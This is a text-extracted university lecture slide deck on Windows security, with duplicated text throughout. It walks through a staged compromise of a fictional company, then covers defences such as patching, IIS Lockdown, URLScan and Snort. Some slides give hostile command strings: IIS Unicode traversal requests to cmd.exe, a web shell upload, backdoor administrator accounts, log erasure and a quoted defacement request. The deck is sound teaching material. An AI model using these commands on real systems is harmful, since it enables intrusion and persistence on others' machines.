Download ppt - Slide 1 1 Windows Security Analysis Computer Science E-Commerce Security Matthew Cook

Slide 1

1

Windows Security AnalysisComputer Science E-Commerce Security

Matthew Cookhttp://escarpment.net/

Slide 2

2

IntroductionIntroduction

Loughborough UniversityLoughborough Universityhttp://www.lboro.ac.uk/computing/http://www.lboro.ac.uk/computing/

Janet Web Cache ServiceJanet Web Cache Servicehttp://wwwcache.ja.net/http://wwwcache.ja.net/

Slide 3

3

Windows Security AnalysisWindows Security Analysis

IntroductionIntroduction Step-by-step Machine CompromiseStep-by-step Machine Compromise Preventing AttackPreventing Attack Further ReadingFurther Reading The FutureThe Future

Slide 4

4

IntroductionIntroduction

Physical SecurityPhysical Security Security ThreatsSecurity Threats ““Hacker” or “Cracker”Hacker” or “Cracker” The Easiest Security ImprovementThe Easiest Security Improvement Can you buy security?Can you buy security?

Slide 5

5

Physical SecurityPhysical Security

Secure LocationSecure Location BIOS restrictionsBIOS restrictions Password ProtectionPassword Protection Boot DevicesBoot Devices Case LocksCase Locks Case PanelsCase Panels

Slide 6

6

Security ThreatsSecurity Threats

Denial of ServiceDenial of Service Theft of informationTheft of information ModificationModification Fabrication (Spoofing or Masquerading)Fabrication (Spoofing or Masquerading)

Slide 7

7

Security Threats…Security Threats…

Why a compromise can occur:Why a compromise can occur: Physical Security HolesPhysical Security Holes Software Security HolesSoftware Security Holes Incompatible Usage Security HolesIncompatible Usage Security Holes Social EngineeringSocial Engineering ComplacencyComplacency

Slide 8

8

““Hacker” or “Cracker”Hacker” or “Cracker”

““Hacker” used primarily by the media to Hacker” used primarily by the media to describe malicious attacks by individualsdescribe malicious attacks by individuals

However the computing community uses However the computing community uses “Cracker” to mean the same“Cracker” to mean the same

A “Hacker” tinkers with systems for good A “Hacker” tinkers with systems for good purposes. (Not breaking the law)purposes. (Not breaking the law)

To avoid confusion many people now sayTo avoid confusion many people now say“A machine has been compromised!”“A machine has been compromised!”Not “A machine has been hacked!”Not “A machine has been hacked!”

Slide 9

9

The Easiest Security ImprovementThe Easiest Security Improvement

Good passwordsGood passwords Usernames and Passwords are the primary Usernames and Passwords are the primary

security defencesecurity defence

Use a password that is easy to type to avoid Use a password that is easy to type to avoid ‘Shoulder Surfers’‘Shoulder Surfers’

Use the first letters from song titles, song Use the first letters from song titles, song lyrics or film quotationslyrics or film quotations

Slide 10

10

Can you buy Security?Can you buy Security?

““This system is secure.”This system is secure.” A product vendor A product vendor might say: might say: “This product makes your “This product makes your network secure.”network secure.” Or: Or: “We secure e-“We secure e-commerce.”commerce.” Inevitably, these claims are Inevitably, these claims are naïve and simplistic. They look at the naïve and simplistic. They look at the security of the product, rather than the security of the product, rather than the security of the system. The first questions to security of the system. The first questions to ask are: ask are: “Secure from whom?”“Secure from whom?” and and “Secure against what?”“Secure against what?”

Bruce SchneierBruce Schneier

Slide 11

11

Step-by-step Machine CompromiseStep-by-step Machine Compromise

BackgroundBackground Gathering InformationGathering Information Identifying System WeaknessIdentifying System Weakness Exploiting the Security HoleExploiting the Security Hole Gaining ‘Root’Gaining ‘Root’ Backdoor AccessBackdoor Access System AlterationSystem Alteration Audit Trail RemovalAudit Trail Removal

Slide 12

12

BackgroundBackground

Reasons for Attack:Reasons for Attack:

Personal IssuesPersonal Issues Political StatementPolitical Statement Financial Gain (Theft of money, information)Financial Gain (Theft of money, information) Learning ExperienceLearning Experience DoS (Denial of Service)DoS (Denial of Service) Support for Illegal ActivitySupport for Illegal Activity

In our scenario we are going to attack the In our scenario we are going to attack the company laggyband.comcompany laggyband.com

Slide 13

13

Gathering InformationGathering Information

Companies HouseCompanies House Internet SearchInternet Search

URL: URL: http://www.google.co.ukhttp://www.google.co.uk WhoisWhois

URL: URL: http://www.netsol.com/cgi-bin/whois/whoishttp://www.netsol.com/cgi-bin/whois/whois A Whois query can provide:A Whois query can provide:

– The RegistrantThe Registrant– The Domain Names RegisteredThe Domain Names Registered– The Administrative, Technical and Billing ContactThe Administrative, Technical and Billing Contact– Record updated and created date stampsRecord updated and created date stamps– DNS Servers for the DomainDNS Servers for the Domain

Slide 14

14

Gathering Information…Gathering Information…

Use Nslookup or digUse Nslookup or dig dig @dns.laggyband.com www.laggyband.comdig @dns.laggyband.com www.laggyband.com Different query type available:Different query type available:

– A – Network addressA – Network address– Any – All or Any Information availableAny – All or Any Information available– Mx – Mail exchange recordsMx – Mail exchange records– Soa – Zone of AuthoritySoa – Zone of Authority– Hinfo – Host informationHinfo – Host information– Axfr – Zone TransferAxfr – Zone Transfer– Txt – Additional stringsTxt – Additional strings

Slide 15

15

Identifying System WeaknessIdentifying System Weakness

Many products available:Many products available: NmapNmap NessusNessus

PandoraPandora PwdumpPwdump L0pht CrackL0pht Crack Null AuthenticationNull Authentication

Slide 16

16

NmapNmap

Port Scanning ToolPort Scanning Tool Stealth scanning, OS FingerprintingStealth scanning, OS Fingerprinting Open SourceOpen Source Runs under Unix based OSRuns under Unix based OS Port development for Win32Port development for Win32 URL: URL: http://www.insure.org/nmap/http://www.insure.org/nmap/

Slide 17

17

NmapNmap

Slide 18

18

NessusNessus

Remote security scanner similar to TyphonRemote security scanner similar to Typhon Very comprehensiveVery comprehensive Frequently updated modulesFrequently updated modules Testing of DoS attacksTesting of DoS attacks Open SourceOpen Source Win32 and Java ClientWin32 and Java Client URL: URL: http://nessus.org/http://nessus.org/

Slide 19

19

PandoraPandora

Not strictly Windows SecurityNot strictly Windows Security Runs on either Unix or Win32Runs on either Unix or Win32 Excellent tool to evaluate Netware securityExcellent tool to evaluate Netware security Open SourceOpen Source Lots of additional informationLots of additional information URL: URL: http://www.nmrc.org/pandora/http://www.nmrc.org/pandora/

Slide 20

20

pwdumppwdump

Version 3 (e = encrypted)Version 3 (e = encrypted) Developed by Phil Staubs and Erik Developed by Phil Staubs and Erik

HjelmstadHjelmstad Based on pwdump and pwdump2Based on pwdump and pwdump2 URL: URL: http://www.ebiz-tech.com/html/pwdump.htmlhttp://www.ebiz-tech.com/html/pwdump.html Needs Administrative PrivilidgesNeeds Administrative Privilidges Extracts hashs even if syskey is installedExtracts hashs even if syskey is installed Extract from remote machinesExtract from remote machines Identifies accounts with no passwordIdentifies accounts with no password Self contained utilitySelf contained utility

Slide 21

21

L0pht CrackL0pht Crack

Password Auditing and RecoveryPassword Auditing and Recovery Crack Passwords from many sourcesCrack Passwords from many sources Registration $249Registration $249 URL: URL: http://www.atstake.com/research/lc3/http://www.atstake.com/research/lc3/

Slide 22

22

L0pht CrackL0pht Crack

Crack Passwords from:Crack Passwords from: Local MachineLocal Machine Remote MachineRemote Machine SAM FileSAM File SMB SnifferSMB Sniffer PWDump filePWDump file

Slide 23

23

Nmap AnalysisNmap Analysis

nmap –sP 158.125.0.0/16nmap –sP 158.125.0.0/16 Dependant on ICMP (Internet Control Dependant on ICMP (Internet Control

Message Protocol)Message Protocol) nmap –sP –PT80 158.125.0.0/16nmap –sP –PT80 158.125.0.0/16 Dependant on TCP SYN/ACK packetDependant on TCP SYN/ACK packet

Slide 24

24

Nmap Analysis…Nmap Analysis…

TCP Connect ScanTCP Connect Scan Completes a ‘Three Way Handshake’Completes a ‘Three Way Handshake’ Very noisy (Detection by IDS)Very noisy (Detection by IDS)

Slide 25

25


TCP SYN ScanTCP SYN Scan Half open scanning (Full port TCP Half open scanning (Full port TCP

connection not made)connection not made) Less noisy than the TCP Connect ScanLess noisy than the TCP Connect Scan

Slide 26

26


TCP FIN ScanTCP FIN Scan– FIN Packet sent to target portFIN Packet sent to target port– RST returned for all closed portsRST returned for all closed ports– Mostly works UNIX based TCP/IP StacksMostly works UNIX based TCP/IP Stacks

TCP Xmas Tree ScanTCP Xmas Tree Scan– Sends a FIN, URG and PUSH packetSends a FIN, URG and PUSH packet– RST returned for all closed portsRST returned for all closed ports

TCP Null ScanTCP Null Scan– Turns off all flagsTurns off all flags– RST returned for all closed portsRST returned for all closed ports

UDP ScanUDP Scan– UDP Packet sent to target portUDP Packet sent to target port– ““ICMP Port Unreachable” for closed portsICMP Port Unreachable” for closed ports

Slide 27

27

Null AuthenticationNull Authentication

Null Authentication:Null Authentication: Net use Net use \\camford\IPC$\\camford\IPC$ “” /u:“” “” /u:“” Famous tools like ‘Red Button’Famous tools like ‘Red Button’ Net view Net view \\camford\\camford

List of Users, groups and sharesList of Users, groups and shares Last logged on dateLast logged on date Last password changeLast password change Much more…Much more…

Slide 28

28

Exploiting the Security HoleExploiting the Security Hole

Using IIS Unicode/Directory TraversalUsing IIS Unicode/Directory Traversal /scripts/../../winnt/system32/cmd.exe /c+dir/scripts/../../winnt/system32/cmd.exe /c+dir /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir Displays the listing of c: in browserDisplays the listing of c: in browser

Copy cmd.exe to /scripts/root.exeCopy cmd.exe to /scripts/root.exe Echo upload.aspEcho upload.asp GET /scripts/root.exe /c+echo+[blah]>upload.aspGET /scripts/root.exe /c+echo+[blah]>upload.asp Upload cmdasp.asp using upload.aspUpload cmdasp.asp using upload.asp

Still vulnerable on 24% of E-Commerce serversStill vulnerable on 24% of E-Commerce servers

Slide 29

29

Gaining ‘Root’Gaining ‘Root’

Cmdasp.asp provides a cmd shell in the Cmdasp.asp provides a cmd shell in the SYSTEM contextSYSTEM context

Increase in privileges is now simpleIncrease in privileges is now simple

ISAPI.dll – RevertToSelf (Horovitz)ISAPI.dll – RevertToSelf (Horovitz) Version 2 coded by FoundstoneVersion 2 coded by Foundstone http://camford/scripts/idq.http://camford/scripts/idq.dlldll? ? Patch Bulletin: MS01-26Patch Bulletin: MS01-26 NOT included in Windows 2000 SP2NOT included in Windows 2000 SP2

Slide 30

30

Backdoor AccessBackdoor Access

Create several user accountsCreate several user accounts Net user iisservice <pass> /ADDNet user iisservice <pass> /ADD Net localgroup administrators iisservice /ADDNet localgroup administrators iisservice /ADD Add root shells on high end portsAdd root shells on high end ports Tiri is 3Kb in sizeTiri is 3Kb in size Add backdoors to ‘Run’ registry keys Add backdoors to ‘Run’ registry keys

Slide 31

31

System AlterationSystem Alteration

Web page alterationWeb page alteration Information TheftInformation Theft Enable servicesEnable services Add VNCAdd VNC

Creating a Warez ServerCreating a Warez Server Net start msftpsvcNet start msftpsvc Check accessCheck access Upload file 1Mb in sizeUpload file 1Mb in size Advertise as a warez server Advertise as a warez server

Slide 32

32

Audit Trail RemovalAudit Trail Removal

Many machines have auditing disabledMany machines have auditing disabled Main problems are IIS logsMain problems are IIS logs DoS IIS before logs sync to discDoS IIS before logs sync to disc Erase logs from hard discErase logs from hard disc Erasing Eventlog harderErasing Eventlog harder

IDS SystemsIDS Systems Network Monitoring at firewallNetwork Monitoring at firewall

Slide 33

33

Preventing AttackPreventing Attack

NetBIOS/SMB ServicesNetBIOS/SMB Services Hfnetchk and QchainHfnetchk and Qchain SNMP VulnerabilitiesSNMP Vulnerabilities Active Directory VulnerabilitiesActive Directory Vulnerabilities IPSecIPSec IIS SecurityIIS Security IDS – SnortIDS – Snort .NET Server.NET Server

Slide 34

34

NetBIOS/SMB ServicesNetBIOS/SMB Services

NetBIOS Browsing Request [UDP 137]NetBIOS Browsing Request [UDP 137] NetBIOS Browsing Response [UDP 138]NetBIOS Browsing Response [UDP 138] NetBIOS Communications [TCP 135]NetBIOS Communications [TCP 135] CIFS [TCP 139, 445 UDP 445]CIFS [TCP 139, 445 UDP 445] Port 445 Windows 2000 onlyPort 445 Windows 2000 only Block ports at firewallBlock ports at firewall Netstat -ANetstat -A

Slide 35

35

NetBIOS/SMB Services…NetBIOS/SMB Services…

To disable NetBIOSTo disable NetBIOS1.1. Select ‘Disable NetBIOS’ in the WINS tab Select ‘Disable NetBIOS’ in the WINS tab

of advanced TCP/IP properties.of advanced TCP/IP properties.2.2. Deselect ‘File and Print sharing’ in the Deselect ‘File and Print sharing’ in the

advanced settings of the ‘Network and Dial-advanced settings of the ‘Network and Dial-up connections’ windowup connections’ window

Slide 36

36

NetBIOS/SMB Services…NetBIOS/SMB Services…

Disable Null AuthenticationDisable Null Authentication Key similar to Windows NT 4.0Key similar to Windows NT 4.0 HKLM\SYSTEM\CurrentControlSet\Control\LSA\HKLM\SYSTEM\CurrentControlSet\Control\LSA\

RestrictAnonymousRestrictAnonymous REG_DWORD set to 0, 1 or REG_DWORD set to 0, 1 or 2!2! HKLM\SYSTEM\CurrentControlSet\Control\HKLM\SYSTEM\CurrentControlSet\Control\

SecurePipeServers\RestrictAnonymousSecurePipeServers\RestrictAnonymous REG_DWORD set to 0 or 1REG_DWORD set to 0 or 1

Slide 37

37

HfnetchkHfnetchk

Use Hfnetchk to check hot fixesUse Hfnetchk to check hot fixes Checks machines against Microsoft XMLChecks machines against Microsoft XML Automate the process using a batch files and Automate the process using a batch files and

a mail client (Postie)a mail client (Postie) URL: URL: http://www.infradig.com/infradig/postie/http://www.infradig.com/infradig/postie/ Use QChain to chain hot fixes together Use QChain to chain hot fixes together

without rebooting in-between.without rebooting in-between.

Slide 38

38

Hfnetchk…Hfnetchk…

Patch details for:Patch details for: Windows NT 4.0, 2000, XP, .NET serverWindows NT 4.0, 2000, XP, .NET server IIS 4, IIS 5 and IIS 6IIS 4, IIS 5 and IIS 6 SQL Server 7.0SQL Server 7.0 SQL Server 2000SQL Server 2000 Internet Explorer 5.01 (and later)Internet Explorer 5.01 (and later)

Slide 39

39

Hfnetchk…Hfnetchk…

Default scan of local host (Pre downloaded)Default scan of local host (Pre downloaded)hfnetchk –x mssecure.xmlhfnetchk –x mssecure.xml

Default scan of lboro domainDefault scan of lboro domainhfnetchk –d lborohfnetchk –d lboro

Verbose scan of local hostVerbose scan of local hosthfnetchk –v –x mssecure.xmlhfnetchk –v –x mssecure.xml

Verbose scan including installed hot fixesVerbose scan including installed hot fixeshfnetchk –v –a b –x mssecure.xmlhfnetchk –v –a b –x mssecure.xml

Slide 40

40

SNMP VulnerabilitiesSNMP Vulnerabilities

Simple Network Management ProtocolSimple Network Management Protocol Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25Snmpwalk camford public .1.3.6.1.4.1.77.1.2.25 SNMP Utilities in Resource KitSNMP Utilities in Resource Kit Turn off SNMP servicesTurn off SNMP services Set community namesSet community names Set accepted hostsSet accepted hosts

Slide 41

41

SNMP Vulnerabilities…SNMP Vulnerabilities…

Slide 42

42

SNMP Vulnerabilities…SNMP Vulnerabilities…

CERT Advisory “Tuesday 12CERT Advisory “Tuesday 12thth February” February” Privilege Escalation, DoS, InstabilityPrivilege Escalation, DoS, Instability Block UDP 161 and 162 at firewallBlock UDP 161 and 162 at firewall Patch or disable SNMPPatch or disable SNMP Patches available for Windows 2000 and XPPatches available for Windows 2000 and XP URL: URL:

http://www.microsoft.com/technet/treeview/default.ahttp://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-006.aspsp?url=/technet/security/bulletin/ms02-006.asp

Slide 43

43

AD VulnerabilitiesAD Vulnerabilities

Listing of AD contents using ldp.exeListing of AD contents using ldp.exe Ldp is contained on the Resource KitLdp is contained on the Resource Kit Authenticated connection neededAuthenticated connection needed Filter TCP 389 (LDAP) and 3268 (GC)Filter TCP 389 (LDAP) and 3268 (GC) DNS – Securing Zone Transfers to Slave DNS – Securing Zone Transfers to Slave

Name servers onlyName servers only

Slide 44

44

IPSecIPSec

IP securityIP security Linux Connectivity using FreeS/WANLinux Connectivity using FreeS/WAN Mainly for wireless useMainly for wireless use WEP encryption crackedWEP encryption cracked URL: URL: http://www.freeswan.org/http://www.freeswan.org/ URL: URL: http://airsnort.sourceforge.net/http://airsnort.sourceforge.net/

Slide 45

45

IIS SecurityIIS Security

HistoryHistory Recent WormsRecent Worms IIS Lock Down ToolIIS Lock Down Tool URL ScanURL Scan The FutureThe Future

Slide 46

46

IIS HistoryIIS History

IIS 2.0 Installed by NT 4.0IIS 2.0 Installed by NT 4.0 IIS 3.0 followed by more common IIS 4.0IIS 3.0 followed by more common IIS 4.0 Quickly gained reputation for (in)securityQuickly gained reputation for (in)security IIS 5.0 Installed by Windows 2000IIS 5.0 Installed by Windows 2000 IIS 6.0 Installed by .NET ServerIIS 6.0 Installed by .NET Server Microsoft releases HfnetchkMicrosoft releases Hfnetchk Closely followed by IIS Lockdown and Closely followed by IIS Lockdown and

URLScanURLScan

Slide 47

47

Recent WormsRecent Worms

Sadmind/IISSadmind/IISDirectory Traversal (Unicode Exploit)Directory Traversal (Unicode Exploit)

CodeRedCodeRedida/idq buffer overflowida/idq buffer overflow

CodeGreenCodeGreen ida/idq buffer overflow ida/idq buffer overflow

NimdaNimdaDirectory Traversal (Unicode Exploit)Directory Traversal (Unicode Exploit)

Slide 48

48

Sadmind/IISSadmind/IIS

2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 2001-05-03 22:34:49 203.67.x.x - 158.125.x.x 80 GET /scripts/root.exe GET /scripts/root.exe /c+echo+^<html^>^<body+bgcolor/c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%22center%22^>^<font+size%3D7+color%3Dred^>f***+USA+Government^</%3Dred^>f***+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22centerfont^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%22^>^<font+size%3D7+color%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%3Dred^>f***+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%22center%22^>^<font+size%3D4+color%3Dred^>contact:[email protected]^</%3Dred^>contact:[email protected]^</html^>>../wwwroot/default.htm 200 -html^>>../wwwroot/default.htm 200 -

Slide 49

49

IIS Lock Down ToolIIS Lock Down Tool

Automatic ‘Lock Down’ [Now 2Automatic ‘Lock Down’ [Now 2ndnd version] version] Locks down IIS 4.0 and IIS 5.0Locks down IIS 4.0 and IIS 5.0 Express ‘lock down’ for simple web sitesExpress ‘lock down’ for simple web sites Custom ‘lock down’ for more complex serversCustom ‘lock down’ for more complex servers Undo facility to reverse last ‘lock down’Undo facility to reverse last ‘lock down’ URL: URL: http://www.microsoft.com/Downloads\http://www.microsoft.com/Downloads\

Release.asp?ReleaseID=32362Release.asp?ReleaseID=32362

Slide 50

50

IIS Lock Down Tool…IIS Lock Down Tool…

Disable:Disable: Active Server PagesActive Server Pages Index Server InterfaceIndex Server Interface Server Side IncludesServer Side Includes Internet Data Internet Data

ConnectorConnector Internet PrintingInternet Printing HTR ScriptingHTR Scripting

Remove:Remove: Sample Web FilesSample Web Files Script Virtual Script Virtual

DirectoryDirectory MSADC DirectoryMSADC Directory WebDAVWebDAVSet Permissions on:Set Permissions on: Exe filesExe files Content DirectoriesContent Directories

Slide 51

51

URL ScanURL Scan

ISAPI filter scans incoming HTTP requestsISAPI filter scans incoming HTTP requests Filtered based on rule setFiltered based on rule set New rules easily addedNew rules easily added Default urlscan.ini suitable for static pagesDefault urlscan.ini suitable for static pages Restart service when changes madeRestart service when changes made 404 and logged request for matched rules404 and logged request for matched rules URL: URL: http://www.microsoft.com/Downloads\http://www.microsoft.com/Downloads\

Release.asp?ReleaseID=32571Release.asp?ReleaseID=32571

Slide 52

52

URL Scan…URL Scan…

Filter on:Filter on: The request method (verb)The request method (verb) File ExtensionFile Extension URL EncodingURL Encoding Non ASCII charactersNon ASCII characters Malicious character sequenceMalicious character sequence Headers in HTTP GETHeaders in HTTP GET

Slide 53

53

The FutureThe Future

Gartner report recommends ditching IISGartner report recommends ditching IIS Rewrite of IIS on the cards for version 6Rewrite of IIS on the cards for version 6 Lock Down Tool (Interim Measures)Lock Down Tool (Interim Measures) Httpd functionality in the kernel (TechEd)Httpd functionality in the kernel (TechEd) IIS Lockdown included in SP3IIS Lockdown included in SP3 Further implications for .NETFurther implications for .NET

Slide 54

54

IDS SnortIDS Snort

IDS – Intrusion Detection SystemIDS – Intrusion Detection System Libpcap packet sniffer and loggerLibpcap packet sniffer and logger Originally developed for the Unix platformsOriginally developed for the Unix platforms Open SourceOpen Source Port to Win32 available (Release 1.8.1)Port to Win32 available (Release 1.8.1) Installation on Win32 in under 30 minutesInstallation on Win32 in under 30 minutes Run on your IIS server or standaloneRun on your IIS server or standalone

Slide 55

55

IDS Snort…IDS Snort…

Snort can detect:Snort can detect: Stealth Port ScansStealth Port Scans CGI AttacksCGI Attacks Front Page Extensions AttacksFront Page Extensions Attacks ICMP ActivityICMP Activity SMTP ActivitySMTP Activity SQL ActivitySQL Activity SMB ProbesSMB Probes

Slide 56

56

IDS Snort…IDS Snort…

Default logging to snort\logs\alert.idsDefault logging to snort\logs\alert.ids Log to mySQL and SQL ServerLog to mySQL and SQL Server Notification as logs, ‘winpopup’, email etcNotification as logs, ‘winpopup’, email etc SnortSnaf or ACID (PHP Based)SnortSnaf or ACID (PHP Based) GUI – IDS CenterGUI – IDS Center URL: URL: http://snort.sourcefire.com/http://snort.sourcefire.com/ URL: URL: http://www.cert.org/kb/acid/http://www.cert.org/kb/acid/ URL: URL: http://www.silicondefense.com/http://www.silicondefense.com/

Slide 57

57

Snort…Snort…

Slide 58

58

.NET Server.NET Server

Slide 59

59

.NET Server….NET Server…

Web Web ServerServer

StandardStandardServerServer

EnterpriseEnterpriseServerServer

DatacenterDatacenterServerServer

RAMRAM 2Gb2Gb 4Gb4Gb 64Gb64Gb 128Gb128Gb

CPUCPU 22 22 88 3232

ClusterCluster N/AN/A N/AN/A 4 node4 node 8 node8 node

64-bit64-bit N/AN/A N/AN/A YesYes YesYes

NotesNotes WWWWWW SOHOSOHO Large SiteLarge Site OEM OnlyOEM Only

Slide 60

60


Mainly improvements in AD and ManagementMainly improvements in AD and Management Blank passwords at console onlyBlank passwords at console only Improved command line toolsImproved command line tools Evaluating Security on build 3590Evaluating Security on build 3590 IIS Currently secure from installIIS Currently secure from install Auditing enabled by defaultAuditing enabled by default Integrated change logIntegrated change log XML OutputXML Output

Slide 61

61


Slide 62

62


Slide 63

63


Slide 64

64


Slide 65

65


Slide 66

66

Further ReadingFurther Reading

Schneier, B Schneier, B Secrets & Lies (Digital Secrets & Lies (Digital Security in a Networked World) [ISBN Security in a Networked World) [ISBN 0471253111]0471253111]

Hacking Exposed Series McGraw HillHacking Exposed Series McGraw Hill

Security FocusSecurity Focus BugtraqBugtraq

GoogleGoogle

Slide 67

67

QuestionsQuestions